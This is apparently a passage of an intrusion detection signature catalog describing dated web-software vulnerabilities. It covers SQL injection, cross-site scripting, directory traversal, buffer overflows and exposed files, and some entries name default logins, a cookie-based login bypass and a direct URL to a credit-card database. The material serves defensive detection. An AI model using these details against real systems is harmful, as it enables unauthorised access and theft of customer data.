Microsoft FrontPage 2000 Internet Publishing Service Provider DAV File Upload Vulnerability
Threat Level: Warning
Nessus: 10498
Signature Description: Microsoft FrontPage (full name Microsoft Office FrontPage) is a WYSIWYG HTML editor and
web site administration tool from Microsoft for the Microsoft Windows line of operating systems. Microsoft FrontPage
2000 is vulnerable to file uploading: misconfigured web servers allow remote clients to perform dangerous HTTP
methods such as PUT and DELETE. This can lead to unauthorized access and possibly the deletion of important files
through DELETE.
Signature ID: 1224
Demarc PureSecure Authentication Check SQL Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0539 Bugtraq: 4520
Signature Description: Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to
being a generalized network monitoring solution. Snort is an open-source NIDS (Network Intrusion Detection System).
Demarc PureSecure will run on most Linux and Unix variants, as well as Microsoft Windows NT/2000/XP operating
systems. A vulnerability has been reported in some versions of PureSecure. User-supplied input is used to construct a
SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this
flaw. Demarc PureSecure 1.0.5 Windows and Demarc PureSecure 1.0.5 Unix are prone to this vulnerability.
Signature ID: 1225
Mountain-net WebCart Exposed Orders Vulnerability (2)
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Certain
poorly configured default installations leave customer order information in remotely accessible text files, including
credit card details and other sensitive information. These files include orders/checks.txt, config/check.txt,
config/mountain.cfg, and possibly others. Exact version information has not been determined; this default configuration
issue may have been resolved in more recent versions. Regardless, it should be noted that this is not a vulnerability in
the strictest sense but rather a poor configuration issue. Mountain Network Systems Inc. WebCart 1.0 is prone to this
vulnerability.
Signature ID: 1226
Mountain-net WebCart Exposed Orders Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0610 Bugtraq: 2281 Nessus: 10298
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Certain
poorly configured default installations leave customer order information in remotely accessible text files, including
credit card details and other sensitive information. These files include orders/checks.txt, config/import.txt,
config/mountain.cfg, and possibly others. Exact version information has not been determined; this default configuration
issue may have been resolved in more recent versions. Regardless, it should be noted that this is not a vulnerability in
the strictest sense but rather a poor configuration issue. Mountain Network Systems Inc. WebCart 1.0 is prone to this
vulnerability.
Signature ID: 1227
OpenView Manager Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0552 Bugtraq: 2845
Signature Description: Ovactiond is part of the system management software packages OpenView and NetView,
distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities. A
problem with the software makes it possible for a remote user to execute commands on a managed system with the
privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed
with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in
quotes and escapes. Tivoli NetView is not vulnerable to this by default, but may be if customized. IBM Tivoli NetView
6.0, IBM Tivoli NetView 5.1, IBM Tivoli NetView 5.0, HP OpenView Network Node Manager 6.10, and HP OpenView
Network Node Manager 5.0 1 are vulnerable versions.
Signature ID: 1228
ICQ Webfront HTTP Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1078 Bugtraq: 1463
Signature Description: The guestbook.cgi script allows you to define "guestbook" pages within your Web site to which
visitors can add their own comments. Your Web site may include as many guestbook pages as you wish. Each
guestbook page is configured by creating both an HTML page that visitors will see, and a configuration file that
controls how the new-comment form will look, whether the visitor will be sent a thank-you note, whether you'll be
notified of visitors, etc. ICQ Web Front for Windows 9x is vulnerable to a denial of service attack because it does not
properly validate user-supplied data in requests. A remote attacker can send a question mark (?) appended to a URL to
cause the targeted user's Web Front to crash and possibly crash the entire system.
Signature ID: 1229
ICQ webserver Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0474
Signature Description: A web server is a computer with a boot device or other disk containing a web site. A remote
attacker could send a request containing "dot dot" (../) sequences to access arbitrary files outside of the user's personal
directory. The server does not properly validate this type of request, so arbitrary files may be accessed.
Signature ID: 1230
BRS WebWeaver ISAPISkeleton.dll Cross-Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2128 Bugtraq: 9516
Signature Description: BRS WebWeaver is a free personal web server that runs on the Windows platform. BRS
WebWeaver 1.07 and earlier versions are vulnerable to cross-site scripting. A remote attacker can create a malicious
link to the vulnerable server that includes embedded HTML and script code. If this link is followed by a victim user,
hostile code embedded in the link may be rendered in the user's browser in the context of the server. Successful
exploitation could permit theft of cookie-based authentication credentials or other attacks.
Signature ID: 1231
BEA WebLogic XSS in InteractiveQuery.jsp access Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0624 Bugtraq: 8938
Signature Description: The BEA WebLogic InteractiveQuery.jsp example application is a CGI application that
demonstrates the use of arguments to query a database. BEA WebLogic 8.1 and prior are vulnerable: WebLogic
InteractiveQuery.jsp is prone to a cross-site scripting vulnerability. The issue is reported to exist due to insufficient
sanitization of user-supplied data in an initialization argument called 'person'. It has been reported that if an invalid
value is passed to this argument, the software returns the value back to the user in a results page without proper
sanitization. The problem may allow a remote attacker to execute HTML or script code in the browser of a user
following a malicious link created by the attacker. Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication information that could be used to launch further attacks. No remedy available as of July
2008.
Signature ID: 1232
Invision Power Board Search.PHP "st" SQL Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0338 Bugtraq: 9766
Signature Description: Invision Power Services is one of the world's leading providers of community solutions.
Invision Power Board is vulnerable to a SQL injection attack present in the 'search.php' script. A remote attacker may
corrupt the resulting SQL queries (there are at least two) by specially crafting a value for the "st" variable. The impact
of this vulnerability depends on the underlying database; it may be possible to read or corrupt sensitive data, perform
other manipulations on the database, execute commands or procedures on the database server, or possibly exploit
vulnerabilities in the database itself through this condition. It has been reported that this issue may also affect the
'sources/Memberlist.php' and 'sources/Online.php' scripts. Patches are available at the vendor website.
Signature ID: 1233
L3retriever HTTP Probe
Threat Level: Information
Signature Description: Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator through an L3retriever HTTP probe.
Signature ID: 1234
Linksys router default username and password login attempt Vulnerability
Threat Level: Warning
Nessus: 10999
Signature Description: The general design of Linksys routers is similar across all models; therefore, the setup is
similar across all models. Some applications do not perform stringent checks when validating the credentials of a client
host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated
privileges to that of the administrator on a Linksys router.
Signature ID: 1235
Lotus Domino Delete Document attempt Vulnerability
Threat Level: Information
Signature Description: Lotus Domino is an IBM server product used to test, deploy, and manage distributed,
enterprise-grade e-mail, collaboration capabilities, a custom application platform, database, application server,
administration, and Web server. This rule detects when an attacker attempts to delete documents from a Lotus Domino
server.
Signature ID: 1236
Lotus Domino Server Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0009 Bugtraq: 2173 Nessus: 12248,11344
Signature Description: Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration
capabilities, and custom application platform. Lotus Domino 5.0.6, Lotus Domino 5.0.5, Lotus Domino 5.0.3 and Lotus
Domino 5.0.2 are vulnerable to directory traversal on the web server. A remote attacker can send an invalid request
whose URL contains .nsf, .box, or .ns4 together with "dot dot" sequences (/../) to read sensitive files on the Web server.
In order to exploit this vulnerability, the server must be installed under the root directory. This vulnerability does not
work with Internet Explorer because it removes the .nsf from the URL.
Signature ID: 1237
Lotus Domino Edit Document attempt Vulnerability
Threat Level: Information
Signature Description: Lotus Domino is an IBM server product used to test, deploy, and manage distributed,
enterprise-grade e-mail, collaboration capabilities, a custom application platform, database, application server,
administration, and Web server. This rule detects when an attacker attempts to edit documents on a Lotus Domino server.
Signature ID: 1238
Macromedia Sitespring Default Error Page Cross Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1027 Bugtraq: 5249
Signature Description: Macromedia SiteSpring is a J2EE compliant website production management solution. The
Macromedia SiteSpring server runs on Microsoft Windows operating systems and provides a structured way to manage
Web site development: it offers task management, discussion groups, versioning and a client Web site all in one
package. Macromedia SiteSpring 1.2.0 is vulnerable; this version contains a cross-site scripting issue. When a user's
request causes an HTTP 500 error to be returned, the user-supplied data is included in the generated HTML. This data
is not properly sanitized, and it is possible to include arbitrary HTML, including JavaScript.
Signature ID: 1239
McAfee ePO file upload attempt Vulnerability
Threat Level: Information
Industry ID: CVE-2004-0038 Bugtraq: 10200
Signature Description: McAfee's ePolicy Orchestrator server is responsible for distributing packages and code to
ePolicy agents. McAfee ePolicy Orchestrator (ePO) 2.5.1 Patch 13 and 3.0 SP2a Patch 3 are vulnerable to remote code
execution. This vulnerability is due to insufficient sanitization of user-supplied requests to spipe/file via the HTTP
POST method. This vulnerability is fixed in Orchestrator version 3.0 Service Pack 2a. Administrators are advised to
update to Orchestrator version 3.0 Service Pack 2a or a later version to resolve this vulnerability.
Signature ID: 1240
MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0111 Bugtraq: 12265
Signature Description: MaxDB is a SAP-certified open source database for Online Transaction Processing (OLTP) and
On-Line Analytical Processing (OLAP) usage. MaxDB version 7.5.00 is vulnerable: a stack-based buffer overflow
vulnerability exists in this version. A remote attacker could send a specially-crafted long password; the websql CGI
application does not validate user input properly, so the buffer overflows while these values are processed, allowing
arbitrary code to be executed on the system with SYSTEM level privileges.
Signature ID: 1241
MySQL MaxDB WebAgent WebSQL Password Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0111 Bugtraq: 12265
Signature Description: MaxDB is a SAP-certified open source database for Online Transaction Processing (OLTP) and
On-Line Analytical Processing (OLAP) usage. A stack-based buffer overflow vulnerability exists in MaxDB version
7.5.00 caused by improper bounds checking in the websql CGI application. By supplying a specially-crafted long
password, a remote attacker could overflow a buffer and execute arbitrary code on the vulnerable system. This
vulnerability is fixed in MySQL AB MaxDB 7.5.00.18. Administrators are advised to update to MySQL AB MaxDB
7.5.00.18 or a later version to resolve this vulnerability.
Signature ID: 1242
NetGear router default password login attempt with admin/password Vulnerability
Threat Level: Warning
Nessus: 11737
Signature Description: A router is a computer whose software and hardware are usually tailored to the tasks of routing
and forwarding information. Routers generally contain a specialized operating system. Netgear routers have a default
username and password of "admin" and "password"; if this is not changed by the administrator, it is possible for an
attacker to gain administrative access to the router, because this default username and password are hardcoded in the
product source.
Signature ID: 1243
NetObserve authentication bypass attempt Vulnerability
Threat Level: Warning
Bugtraq: 9319
Signature Description: NETObserve is a software solution that can be used to remotely monitor and control Windows
based machines. Its interface is accessed via HTTP. By setting a cookie value, used to send login information to
NETObserve, to 0, an attacker can bypass any checks on login credentials. This can present the attacker with
administrative privileges to the NETObserve application, which can be used to manage other remote client machines.
ExploreAnywhere Software NETObserve 2.0 is prone to this vulnerability.
Signature ID: 1244
Netscape Enterprise directory listing attempt Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0250 Bugtraq: 2285
Signature Description: Netscape Enterprise Server is a web server developed by Netscape Communications
Corporation. The product has since been renamed Sun Java System Web Server, reflecting the product's acquisition by
Sun Microsystems. Netscape Enterprise Server 4.0 is vulnerable and could allow a remote attacker to obtain a directory
listing of the server. A remote attacker can connect to the server using telnet and send an "INDEX / HTTP/1.0" request
to cause the server to display the directory listing. By using this vulnerability an attacker can gain access to sensitive
information. No remedy available.
Signature ID: 1245
Unify eWave ServletExec DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1025 Bugtraq: 1868
Signature Description: Unify's eWave ServletExec is a JSP and a Java Servlet engine which is to be used as a plug-in
to popular web servers like Apache, IIS, Netscape. It is possible to send a URL request which causes the ServletExec
servlet engine to terminate abruptly. The web server, however, is not affected. Unify eWave ServletExec 3.0c is
vulnerable to denial of service. A remote attacker could send a specially-crafted URL that contains the "/servlet/"
string, which invokes the ServletExec servlet and causes an exception if the servlet is already running; this causes the
servlet engine to crash.
Signature ID: 1246
Netscape Unixware overflow vulnerability
Threat Level: Information
Industry ID: CVE-1999-0744 Bugtraq: 908,603
Signature Description: The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnerable to a
remote buffer overflow via a long HTTP GET request with more than 367 characters. By default, the httpd listens on
port 457 of the UnixWare host and serves documentation via http. This vulnerability is fixed in the latest versions.
Users are advised to update to the latest version to resolve this issue.
Signature ID: 1247
Oracle 10g iSQLPlus login.unix connectID overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1362 Bugtraq: 10871
Signature Description: A database server is a computer program that provides database services to other computer
programs or computers, as defined by the client-server model. Database management systems frequently provide
database server functionality. Oracle Database is a relational database management system (RDBMS) produced and
marketed by Oracle Corporation. Oracle9i delivers a new, easy to use SQL*Plus tool called iSQL*Plus that is delivered
through a web browser. Oracle Database Server 10.1.0.2 and prior versions are vulnerable; these versions contain a
buffer overflow vulnerability. A remote attacker could send a specially-crafted login request containing an over-long
Connect-ID; while processing this request a buffer overflow occurs on the server, and the attacker could then run
arbitrary code in the context of the Web server, which is potentially a serious threat especially if this is also the
database server.
Signature ID: 1248
Oracle iSQLPlus login.uix username overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1362 Bugtraq: 10871
Signature Description: A database server is a computer program that provides database services to other computer
programs or computers, as defined by the client-server model. Database management systems frequently provide
database server functionality. Oracle Database is a relational database management system (RDBMS) produced and
marketed by Oracle Corporation. Oracle9i delivers a new, easy to use SQL*Plus tool called iSQL*Plus that is delivered
through a web browser. Oracle Database Server 10.1.0.2 and prior versions are vulnerable; these versions contain a
buffer overflow vulnerability. A remote attacker could send a specially-crafted login request containing an over-long
user name; while processing this request a buffer overflow occurs on the server, and the attacker could then run
arbitrary code in the context of the Web server, which is potentially a serious threat especially if this is also the
database server.
Signature ID: 1249
Oracle iSQLPlus sid overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1362 Bugtraq: 10871
Signature Description: A database server is a computer program that provides database services to other computer
programs or computers, as defined by the client-server model. Database management systems frequently provide
database server functionality. Oracle Database is a relational database management system (RDBMS) produced and
marketed by Oracle Corporation. Oracle9i delivers a new, easy to use SQL*Plus tool called iSQL*Plus that is delivered
through a web browser. Oracle Database Server 10.1.0.2 and prior versions are vulnerable; these versions contain a
buffer overflow vulnerability. A remote attacker could send a specially-crafted request; while processing this request a
buffer overflow occurs on the server, and the attacker could then run arbitrary code in the context of the Web server,
which is potentially a serious threat especially if this is also the database server.
Signature ID: 1250
Oracle iSQLPlus username overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1362 Bugtraq: 10871
Signature Description: A database server is a computer program that provides database services to other computer
programs or computers, as defined by the client-server model. Database management systems frequently provide
database server functionality. Oracle Database is a relational database management system (RDBMS) produced and
marketed by Oracle Corporation. Oracle9i delivers a new, easy to use SQL*Plus tool called iSQL*Plus that is delivered
through a web browser. Oracle Database Server 10.1.0.2 and prior versions are vulnerable; these versions contain a
buffer overflow vulnerability. A remote attacker could send a specially-crafted request to isqlplus containing an
over-long user name; while processing this request a buffer overflow occurs on the server, and the attacker could then
run arbitrary code in the context of the Web server, which is potentially a serious threat especially if this is also the
database server.
Signature ID: 1251
PIX firewall manager directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0158 Bugtraq: 691 Nessus: 10819
Signature Description: The PIX Firewall Manager (PFM) is a software product that allows the configuration of Cisco
PIX Firewall devices via a web-based GUI. PIX Firewall Manager is installed and run on a standard Windows NT
workstation or server that serves as the management station. Cisco PIX Firewall 4.2.1 and Cisco PIX Firewall 4.1.6 are
vulnerable to arbitrary file access. This issue is due to the server not properly sanitizing user input, specifically
traversal style attacks (../../) supplied via the URI. This issue is fixed in Cisco PIX Firewall 4.2.2 and 4.1.6 b.
Administrators are advised to update to the latest version to resolve this issue.
Signature ID: 1252
PeopleSoft PeopleBooks psdoccgi.exe Denial of Service and Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0627 CVE-2003-0626 Bugtraq: 9037,9038
Signature Description: The PeopleSoft PeopleBooks component provides a CGI based search application as part of the
default installation. Oracle PeopleSoft PeopleTools 8.40, 8.41, 8.42 and 8.43 are vulnerable versions. These versions of
PeopleTools may allow a remote attacker to traverse outside the server root directory in order to gain access to sensitive
information. Requests are not properly validated when received, so a remote attacker could send a request to
'psdoccgi.exe' that contains invalid values for the 'headername' and 'footername' arguments of the psdoccgi.exe CGI
script.
Signature ID: 1253
Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1049 Bugtraq: 3388
Signature Description: Phorecast is freely available, open-source web-based single-user email. It allows users to send
and receive email through a web-based interface. A problem exists in Paul M. Jones Phorecast version 0.30a that will
allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the web server
process). A remote attacker can send the server a specially-crafted URL that passes arbitrary data via the $includedir
variable to specify a malicious file containing PHP code to be executed on the host. As a result, the affected script may
be redirected to execute arbitrary code located on an external host, as specified by the attacker.
Signature ID: 1254
Quicktime User-Agent buffer overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0169 Bugtraq: 9735
Signature Description: The Apple Quicktime Streaming Server is used to serve client machines with streaming media
content using TCP/IP. Apple Quicktime Streaming Server 4.1.3 and Apple Darwin Streaming Server 4.1.3 are
vulnerable to a denial of service. This issue presents itself when the software attempts to parse a DESCRIBE request
with a User-Agent field that contains more than 255 characters. Administrators are advised to update to the latest
version to resolve this issue.
Signature ID: 1255
RBS ISP/newuser command based directory traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1036 Bugtraq: 1704 Nessus: 10521
Signature Description: Extent RBS ISP is a full OSS package which combines RADIUS, user management, Web
signup, billing, invoicing and other features for IP service provider businesses. Extent RBS-ISP 2.63 and prior versions
allow any file on the server to be read. A remote attacker could send a specially crafted request URL that contains "dot
dot" (/../) sequences as the value of the 'image' parameter to read any file under the Extent RBS ISP directory and gain
access to sensitive information, such as credit card information, usernames, and passwords, which are stored in the
rbsserv.mdb database.
Signature ID: 1256
Martin Hamilton ROADS File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0215 Bugtraq: 2371 Nessus: 10627
Signature Description: The search.pl program is a Common Gateway Interface (CGI) program used to provide an end
user search front end to ROADS databases. When accessed with no CGI query, the program can return an HTML form
to the user to fill in to make a query. Martin Hamilton ROADS 2.3 allows arbitrary files to be read from the server
host. A remote attacker could send a request via a specially crafted URL composed of '%00' sequences along with a
known filename to disclose the requested file, i.e., by specifying the file name in the "form" parameter and terminating
the filename with a null byte. The program does not properly validate this type of request, so files can be read from the
server host; this can lead to unauthorized access and possibly escalated privileges to that of the administrator.
Signature ID: 1257
Real Server DESCRIBE buffer overflow vulnerability
Threat Level: Information
Industry ID: CVE-2003-0725 Bugtraq: 8476
Signature Description: Helix Universal Server version 9.0 streams the widest variety of media, such as audio, video,
animation, images, and text, to the broadest range of media players, including RealOne Player, Windows Media Player,
and Apple QuickTime Player. Helix Universal Server version 9 and prior are vulnerable to a buffer overflow via
sending a long string to the DESCRIBE command. This vulnerability is fixed in Real Networks Helix Universal Server
9.0.2.802. Users are advised to update to Real Networks Helix Universal Server 9.0.2.802 or a later version to resolve
this vulnerability.
Signature ID: 1258
Trend Micro InterScan eManager buffer overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan which manages spam, message
content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager
3.51 and InterScan eManager 3.51J are vulnerable to a stack-based buffer overflow. Several CGI components of
eManager contain a buffer overflow vulnerability which could allow an attacker to execute arbitrary code within the
Local System context. These CGI components do not validate user input; here the attacker accesses the component
through "SFNotification.dll". The request is accepted without proper validation and the supplied values (overly long
values) are copied into a static buffer, which overflows and may allow arbitrary code execution within the Local
System context.
Signature ID: 1259
SiteWare Editor Desktop Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0555 Bugtraq: 2868
Signature Description: SiteWare Editor's Desktop is a web-based administration tool for manipulating
ScreamingMedia content on a SiteWare web server. Screaming Media SiteWare 3.1, Screaming Media SiteWare 3.0 2,
Screaming Media SiteWare 3.0 1, Screaming Media SiteWare 3.0, Screaming Media SiteWare 2.5 01, Screaming
Media SiteWare 2.5 are vulnerable versions. The SiteWare Editor is a Web-based remote administration interface for
the SiteWare server. A remote attacker could send a URL request containing "dot dot" sequences (/../) to the SiteWare
server; the server does not properly validate the user-supplied input in such requests, so the attacker may traverse
directories and retrieve arbitrary files from the Web server. This signature detects when an attacker accesses
"SWEditServlet", because there is no parameter information.
Signature ID: 1260
SiteWare Editor Desktop Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0555 Bugtraq: 2868,2869
Signature Description: SiteWare Editor's Desktop is a web-based administration tool for manipulating
ScreamingMedia content on a SiteWare web server. Screaming Media SiteWare 3.1, Screaming Media SiteWare 3.0 2,
Screaming Media SiteWare 3.0 1, Screaming Media SiteWare 3.0, Screaming Media SiteWare 2.5 01, Screaming
Media SiteWare 2.5 are vulnerable versions. The SiteWare Editor is a Web-based remote administration interface for
the SiteWare server. A remote attacker could send a URL request containing "dot dot" sequences (/../) to the SiteWare
server; the server does not properly validate the user-supplied input in such requests, so the attacker may traverse
directories and retrieve arbitrary files from the Web server.
Signature ID: 1261
SalesLogix eViewer DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0278 CVE-2000-0289 Bugtraq: 1089,1078
Signature Description: SalesLogix eViewer is a web application integrated with the SalesLogix 2000 package. SalesLogix Corporation eViewer 1.0 is vulnerable to denial of service. eViewer does not perform authorization on administrative commands if they are requested directly in the URL; requesting the 'shutdown' command this way will cause the slxweb.dll process to shut down. Possibly other commands aside from 'shutdown' could be performed by a remote user as well. Although the slxweb.dll process will restart once a new query or session is issued, continually requesting such a URL will cause a denial of service.
Signature ID: 1262
Samba Web Administration Tool Base64 Decoder Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0600 Bugtraq: 10780
Signature Description: Samba Web Administration Tool (SWAT) is a tool that may be used to configure Samba or to obtain links to reference materials useful for solving Windows networking problems. Samba 3.0.4-r1, 3.0.4, 3.0.3, 3.0.2a and 3.0.2 are vulnerable to a stack-based buffer overflow. This issue is due to a failure of the application to properly validate buffer boundaries when copying user-supplied input into a finite buffer. Successful exploitation of this issue will allow a remote, unauthenticated attacker to execute arbitrary code on the affected computer with the privileges of the affected process; Samba typically runs with superuser privileges.
Signature ID: 1263
Samba SWAT Authorization port 901 overflow vulnerability
Threat Level: Information
Industry ID: CVE-2004-0600 Bugtraq: 10780
Signature Description: The Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 is vulnerable to a buffer overflow. This issue is due to a failure of the application to properly validate buffer boundaries when copying user-supplied input into a finite buffer. Successful exploitation of this issue will allow a remote, unauthenticated attacker to execute arbitrary code on the affected computer with the privileges of the affected process; Samba typically runs with superuser privileges. This issue is fixed in Samba 3.0.5; update to Samba 3.0.5 to resolve this issue.
Signature ID: 1264
Niti Telecom Caravan Business Server Remote Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-2170 Bugtraq: 9555
Signature Description: Caravan Business Server is used to develop web applications. Niti Telecom Caravan Business Server 2.00-03D is vulnerable to a directory traversal attack. This version does not validate user-supplied input in request URLs, so an external user can perform a directory traversal attack against the server by manipulating the "fname" parameter of the Sample_showcode.html file. A remote attacker may thereby view any file readable by the web server using '../' escape sequences in URI requests.
Signature ID: 1265
Secure Authentication Bypass Vulnerability
Threat Level: Warning
Bugtraq: 4621
Signature Description: Apache Software Foundation Apache 1.3.24, 1.3.23, 1.3.22, 1.3.20 and 1.3.19 are vulnerable to unauthorized access. These versions of the software from SecureSite do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator.
Signature ID: 1266
Novell Groupwise Servlet Gateway Default Authentication Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1195 Bugtraq: 3697 Nessus: 12122
Signature Description: Novell Groupwise Servlet Gateway is a product that allows Java servlets to be run with NetWare, using Novell JVM for NetWare v1.1.7b and NetWare Enterprise Web Server. A remote attacker may gain access to the Servlet Manager interface by entering the default username/password. The default username is "servlet" and the default password is "manager". Novell Groupwise Enhancement Pack 5.5 and Novell Groupwise 6.0 are prone to this vulnerability.
Signature ID: 1267
SmartWin CyberOffice Shopping Cart 2.0 Client Information Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0925 Bugtraq: 1734
Signature Description: Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for ecommerce-enabled websites running Windows NT 4.0 or 2000. It is possible for a remote user to gain read access to the _private directory on a website running CyberOffice Shopping Cart 2.0. By default the _private directory has world-readable permissions. The Microsoft Access database which contains confidential client details (such as customer orders and unencrypted credit card information) is stored in the _private directory and is thus accessible to attackers. An attacker need only request "http://target/_private/shopping_cart.mdb" with a browser to access it. SmartWin Technology CyberOffice Shopping Cart 2.0 is prone to this vulnerability.
Signature ID: 1268
Trend Micro InterScan eManager Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan which manages spam, message content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager 3.51 j and 3.51 are vulnerable: the CGI components of eManager in these versions contain a buffer overflow vulnerability. A malicious user sending overly long arguments to the SpamExcp.dll script could execute arbitrary code within the Local System context and then reconfigure its settings. Patches are available at the vendor website.
Signature ID: 1269
Sun JavaServer default password login
Threat Level: Information
Industry ID: CVE-1999-0508 Nessus: 10995,10747
Signature Description: By default, Sun JavaServer installs with a default password. The admin account has a password
of admin which is publicly known and documented. This allows attackers to trivially access the system. Users are
advised to change all default install passwords to a unique and secure password. When possible, change default
accounts to custom names as well.
Signature ID: 1270
Trend Micro InterScan eManager Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0958 Bugtraq: 3327 Nessus: 11747
Signature Description: Trend Micro InterScan eManager is a plug-in for InterScan which manages spam, message content, and mail delivery. It can be managed through a web-based console interface. Trend Micro InterScan eManager 3.51 j and 3.51 are vulnerable: the CGI components of eManager in these versions contain a buffer overflow vulnerability. A malicious user sending overly long arguments to the TOP10.dll script could execute arbitrary code within the Local System context and then reconfigure its settings. Patches are available at the vendor website.
Signature ID: 1271
Talentsoft Web+ Source Code Disclosure Vulnerability
Threat Level: Warning
Bugtraq: 1722
Signature Description: Talentsoft's Web+ web application server is a powerful and comprehensive development language for creating web-based client/server applications. TalentSoft Web+ Server 4.6, Web+ Monitor 4.6 and Web+ Client 4.6 are vulnerable versions. When handling requests from a remote user, the Talentsoft Web+ source code view does not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator.
Signature ID: 1272
Apache Tomcat Servlet Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2006 Bugtraq: 4575 Nessus: 11046
Signature Description: Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache Software Foundation Tomcat 4.1 and prior versions are vulnerable; the Tomcat SnoopServlet servlet in these versions does not properly validate the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator. Patches are available at the Sun website.
Signature ID: 1273
Apache Tomcat Servlet Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-2006 Bugtraq: 4575 Nessus: 11046
Signature Description: Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache Software Foundation Tomcat 4.1 and prior versions are vulnerable; the Tomcat TroubleShooter servlet in these versions does not properly validate the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator. Patches are available at the Sun website.
Signature ID: 1274
Apache Tomcat Servlet Malformed URL JSP Source Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0590 Bugtraq: 2527 Nessus: 10949,10715
Signature Description: Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies. Apache Tomcat powers numerous large-scale, mission-critical web applications across a diverse range of industries and organizations. Apache Software Foundation Tomcat 4.0, Apache Software Foundation Tomcat 3.2.1 and BEA Systems Weblogic Server 5.1 are vulnerable versions; these versions do not properly validate the user request, allowing source code to be viewed. A remote attacker can send a GET request that does not end with an HTTP protocol specification (HTTP/1.0 or HTTP/1.1) to receive the source code of the requested JSP file, and possibly obtain database passwords and file names. Apply patch HPTL_00010.
Signature ID: 1275
Eagletron TrackerCam 'fn' Parameter 'ComGetLogFile.php3' Script Directory Traversal
Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0479 Bugtraq: 12592
Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement to a webcam, but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a directory traversal vulnerability. The vulnerability is due to improper validation of the argument supplied to the 'fn' parameter of the 'ComGetLogFile.php3' script. By default TrackerCam runs on TCP port 8090 and acts as a web server. A remote attacker can send a specially crafted request containing '..' sequences in the 'ComGetLogFile.php3' argument and view arbitrary files outside the webroot directory. Restrict access to port 8090 to trusted clients only.
Signature ID: 1276
Eagletron TrackerCam 'fn' Parameter 'ComGetLogFile.php3' Script Log Information
Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0481 Bugtraq: 12592
